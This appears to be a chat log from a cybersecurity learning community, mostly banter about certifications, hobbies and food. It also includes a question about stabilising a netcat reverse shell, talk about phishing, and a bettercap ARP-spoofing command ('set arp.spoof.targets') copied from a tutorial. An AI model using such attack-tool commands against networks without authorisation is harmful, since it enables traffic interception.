I understand that, OffSec has steep price points for individual learners
Wait on ejpt they are revamping the entire course
Time for da Bluetooth speaker in da car 
They're removing one guy completely from it and adding a few things to ejpt
Eh, they just revamped it right? What made them revamp it again...
Aight man. What version of ejpt are we on? Still v2?
Oh they're still in the process of removing neat guy
More like getting enough power for my sub to work
Heard so much shit talk about ejpt but I like the sound about it
He had like 50-60 % of the core materials that everyone skipped because he was so boring
Ejpt will be 100% alexi now
Josh mason that's the guy they're kicking him out
What you wired it to?
Should be fine from any accessory live
It's my new battery I just switched to, thought it had enough power like my old, but guess not
Ahh that's a shame. Still have warranty on the battery to get a replacement if it's new :)
Yeah, it's not even weeks old :/
eJPT is bad bc the standard entry level for pentesting certs has been way higher (e.g. OSCP, eCPPTv2, PNPT, CPTS, etc.)
Can confirm..
I'd say it's good for those JUST learning or testing. But wait till Black Friday sales
I bought my voucher and course for like 100 bucks
thanks to @lone thistle for Moniker Link (CVE-2024-21413) Room. Was very helpful
Gave +1 Rep to @lone thistle (current: #8 - 811)
ben makes awesome rooms
be me, tinkering with Docker containers and not realising ssh -p PORT user@localhost IS NOT THE SAME as ssh -W localhost:PORT user@localhost. 
no-one said it would be easy
Trying to figure out what to have for lunch/dinner, while waiting glue to dry in the garage
engrish 100
whats the project today
10/10
eat glue
food
trying to make a treasure chest
Be me.
Play HEAVILY modded skyrim on hardcore legendary
Be level 4
Walk into a cave with a level 95 Ancient Nightmaster Vampire
oo
are you into puzzles esqy?
I've dabbled
ah fellow Souls-like enjoyer, or rather Sekiro ๐
have you ever thought about making a wooden puzzle
i use to have this puzzle made out of bamboo
lost it lol
have no idea where the heck it went
I recently printed a puzzle box
Using Nolvus. But yah! I walk into the cave thinking "This will be good spell practice"
wait explain to me how somone can make gears and have it run smoothly. i cant fathom the machine making a gear without some kind of support holding it in the gear box
using LotD?
Quickly run out, and EVERYONE follows me, die in 1 hit
as in 3d printer
Lord of the Dance?
Oh yah, even if Nolvus didn't have it, I would add it
you print the parts, then assemble it
Legacy Of The Dragonborn
Legs of the Dragon?
reminds me of getting kicked by seven Rogues in WoW...as a Shaman
tldr: there is a museum that you fill with the stuff you find
oh so lets say your making something with internal gears. do you print it in halves and either glue them or plastic weld them together?
Yes, Legs of the Dragon
Welcome to my skyrim
AceS - Just a bit of planning. Sometimes you can 'Print-in-place', but they are kinda hit and miss. But it's like making a self-build kit
IDP...yes, yes
hm thats cool
have you seen theres a space company that instead of 3d printing it welds rockets
like space rockets
its called relativity space
doesnt surprise me. 3D printers or stuff like them have been used for prototyping for years. It's only relatively recently where the costs have gotten to a consumer pricepoint
When private companies can develop stuff, the tech gets better quickly
very true
3D printed rockets save on up front tooling, enable rapid iteration, decrease part count, and facilitate radically new designs. For your chance to win 2 seats on one of the first Virgin Galactic flights to Space and support a great cause, go to https://www.omaze.com/veritasium
Thanks to Tim Ellis and everyone at Relativity Space for the tour!
nothing promotes development more than dolla bills, y'all
Me x @mossy river pool:
1 - 3 To Jared
the world runs on it fr
Undefeated champion
jabba we need a cyber news channel
Oi, nearly got you a few times
news channel would be nice
thats what im saying
Does someone know the repository sudo bettercap? https://github.com/bettercap/bettercap?tab=readme-ov-file
It was answered previously if I remember?
--> #general message
theres your answer.
I can look at a meal, and even eat it and try to copy it, but all the other stuff involved in it is a mystery to me (how to cook it, what the sauce is etc)
am i missing something? you can't stop people from seeing the html anyway.
the html is how your browser knows what to show when people visit the website
Yes, it could be used as an attack vector. Thats why certificates exist
and why you shouldn't random click on every link that emailed to you
but then, so could a text from a number that has a title.
Or someone wearing a Hi-vis jacket carrying a clipboard.
does anybody know how to make a stable tty shell? when I have nc reverse shell or using exploits I cannot use up- and down- arrows etc but kali now has ZSH and I am not able to use these "get a stable tty shell" tricks anymore
And is why its important to educate people about online security and safety
Araneus - A room on THM called 'What the Shell?' goes through techniques for that
Can anyone help me with sudo bettercap?
A bad person might. Thats why we learn what we do - to prevent that. ISPs take those down when they are reported
You get an email telling you to check your bank? Sweet. Head to a web browser and log into the actual site instead of clicking the links.
Its like... you can't stop it, so mitigate the risks in other ways.
how do you propose to prevent them seeing it? they need the html to see your website
Some sites make a point to say 'We will only ever use your full name in the title'. So if it's 'Dear user' then you know its bad
you still need to send it to the browser. someone can grab that with burp suite and read it
To show anything on your screen, there needs to be a 'Canvas'. HTML provides that canvas. The security stuff IS hosted (or should be) on the company's server. Ok, maybe you can see some JS on there, but again - that will be calling functions from a server you can't access
And you are right. Copying a site is negligibly easy. So you gotta use your own common sense when accessing websites or reading emails. Things like security certs for example.
I'm kinda wondering what your point is though?
Shrug. Theres no real choice.
see? valid certificate
browsers try to make it easy (green padlocks etc)
Which is why the site owners need to do their due diligence.
Still not decided what food items to acquire for... well it's fully dinner now.
Thats too much effort. Plus, I don't really have the stuff for that - Shops close at 3pm on sundays here, and it's just gone 4
So probably gonna be somewhere I can drive to, get food, come back and eat it
shops open on a sunday
thats supermarkets. There are a few smaller places that are open - Co-Op for example is one brand thats open
never been a fan of sunday trading laws
Aye, me neither.
what sort of things do you do outside tryhackme and your job relating to security?
I lock my front door
Thats part of the psychology. If someone can fall for that, They will likely fall for the whole scam. Same as why 'Nigerian Princes' have such bad english and obvious ruses.
All that being said, Imma step back from this - Looks like i'm providing tips to the baddies.
How to turn on the networkManager on Kali Linux?
Sounds like a google question...
that guy still owes me 50k
I've searched for it: It told me to type service networkManager start in my terminal, but it hasn't worked out for some reason
i helped him out several times already
Starting/stopping services doesnt always give a response. It just.. does it
why do you want to turn it on? are you trying to connect to the THM VPN?
Thats cool, ThatGuy - I just don't wanna cross a line, y'know
I'm new to Kali Linux, I myself don't know why to turn it on. I thought I could learn more about it later on
start with learning linux in general.
I come from Ubuntu and decided to learn Kali Linux as well, but things may not seem to work for me
Does someone know bettercap and can help me out?
what are you trying to do? what is telling you to turn it on?
i was talking about the nigerian prince
Nothing actually, I was just curious of it
I'm just following a tutorial on YouTube and follow each step. However, I encounter problems and things do not work for me
This command does not work for me: set arp.spoof.targets <ip address>